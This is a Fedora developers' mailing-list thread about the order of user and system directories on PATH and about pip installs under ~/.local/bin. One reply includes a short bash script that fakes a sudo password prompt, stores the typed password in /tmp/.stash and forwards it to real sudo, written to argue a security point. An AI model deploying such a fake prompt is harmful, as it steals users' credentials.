On 05/02/2018 11:57 PM, Iain Rae wrote:
On 02/05/18 17:50, Kamil Dudka wrote:
On Wednesday, May 2, 2018 4:25:58 PM CEST Iain Rae wrote:
if they've got sudo privs to install software in the system area as root
then any malicious program is going to emulate su/sudo in which case
you're rooted in both scenarios.
In order to emulate su/sudo, the binary needs to have special permissions.
Programs downloaded by web browsers do not get them and non-privileged users
cannot grant such permissions.
ah so something like :
#!/bin/bash
ME=`whoami`
echo [sudo] password for $ME
read -s PASSWD
echo $PASSWD >> /tmp/.stash
echo $PASSWD |sudo -S $* > /dev/null
probably wouldn't work then ;)
I just wanted to say that many users would not need sudo access at all if they
were able to install software to their home directory in a way that it works
out of the box.
oh yes, that would be the ideal situation, and if ~/.login/bin is so
standard you'd think that things like pip would check to see if there
was a more up to date version of themselves in there and run it rather
than the system installation.
pip actually checks if ~/.local/bin is on the PATH and prints a warning
if it isn't. But nobody predicted that ~/.local/bin might be on the PATH
but only behind /usr/bin. That breaks the intuitive expectation that
things installed closer to the user should take priority. Python works
like that.
Tomas
Kamil
_______________________________________________
devel mailing list -- devel@lists.fedoraproject.org
To unsubscribe send an email to devel-le...@lists.fedoraproject.org
